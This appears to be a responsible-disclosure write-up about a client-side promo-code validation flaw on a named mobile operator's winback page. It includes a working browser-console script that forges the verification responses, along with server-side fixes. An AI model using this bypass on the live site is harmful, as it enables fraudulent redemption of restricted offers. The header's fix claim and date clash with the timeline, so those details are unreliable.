Bypassing Winback Promo Validation on Kena Mobile (Telecom Italia)

30 October 2025 • Fixed in <48h • No CVE • Business Impact

TL;DR: The winback promo code verification on kenamobile.it/winback2024/ was entirely client-side. By hooking jQuery.ajax, I could force a successful response and redeem restricted offers without a valid code.

Discovery

While browsing Kena Mobile’s winback campaign page, I noticed that the promo code + phone number verification form looked suspiciously lightweight. Opening DevTools showed that the form sent a single AJAX POST to WordPress’s admin-ajax.php and that the page decided whether to unlock the offer purely from what its JavaScript did with the reply: a classic sign that the validation logic lives in the client rather than on the server.

Target URL: https://www.kenamobile.it/winback2024/

[Screenshot: legitimate coupon + phone number input]

Normal Flow

The legitimate request:

POST https://www.kenamobile.it/wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded

action=apigtw&apigtw_action=verifyDataWinback&code=ABCD1234&msisdn=39XXXXXXXXXX

Successful server response:

{
  "code": 1,
  "data": {
    "said": "WB2024-XXXXXXXXXX"
  }
}

Proof of Concept – Full Client-Side Bypass

The page makes two AJAX calls through jQuery.ajax: the first verifies the code and phone number and returns a SAID token, the second sends that token back (the request body contains "saidResponse") and receives the offer identifier. Because the page acts on whatever its success callbacks receive, overriding jQuery.ajax once is enough to intercept and forge both:

// Paste this in browser console on https://www.kenamobile.it/winback2024/
(() => {
  // Keep the real jQuery.ajax in a local. Storing it as a property of the
  // old function (jQuery.ajax.original) is lost as soon as jQuery.ajax is
  // reassigned, which made every non-intercepted request throw.
  const originalAjax = jQuery.ajax;
  // jQuery accepts data as a string or an object; only inspect strings.
  const dataOf = (o) => (o && typeof o.data === 'string' ? o.data : '');

  // Override AJAX globally
  jQuery.ajax = function (o) {
    // 1. First call – verifyDataWinback: hand the page a fake "valid" result
    if (dataOf(o).includes('verifyDataWinback')) {
      console.log('[PoC] Bypassing winback verification...');
      setTimeout(() => o.success?.({
        data: { code: 1, data: { said: "BYPASSNOV25" } }
      }), 500);
      return { abort: () => {} };
    }

    // 2. Second call – saidResponse: pretend the SAID resolved to an offer
    if (dataOf(o).includes('saidResponse')) {
      console.log('[PoC] Confirming fake offer...');
      setTimeout(() => o.success?.('kena-pack-per-te-5g'), 300);
      return { abort: () => {} };
    }

    // All other requests keep their normal behaviour
    return originalAjax.apply(this, arguments);
  };

  console.log('Winback bypass active – just click "Verifica"');
})();

After pasting and clicking “Verifica” (even with garbage code/phone), the page shows the restricted offer as unlocked.

[Screenshot: restricted offer shown as unlocked after the bypass]

Impact

Anyone can make the winback page present the restricted offer without holding a valid promo code or an eligible phone number. The hook above proves the unlock decision is taken in the browser; the business impact depends on whether the order flow behind the page accepts the SAID and offer name the client hands back, or re-validates them server-side. That second question is the one to settle before calling this more than a UI bypass.

Responsible Disclosure Timeline

3 Nov 2025 Report sent to IT coordinator at Kena Mobile
18 Nov 2025 No response received
19 Nov 2025 Disclosure published

Recommendations

Validate the promo code and MSISDN on the server at every step. The verify call should return a SAID only after a server-side lookup confirms the code exists and was issued to that number; the confirmation step should re-check the SAID it receives (a signed or server-stored token, not a value the browser can invent) against the same record and mark the code as used; and the order flow behind the page should never unlock an offer on the strength of an offer name handed back by the client. Client-side JavaScript may decide what to display, but it cannot be the control.

Final Notes

No real user data was accessed. Testing performed ethically on my own number.
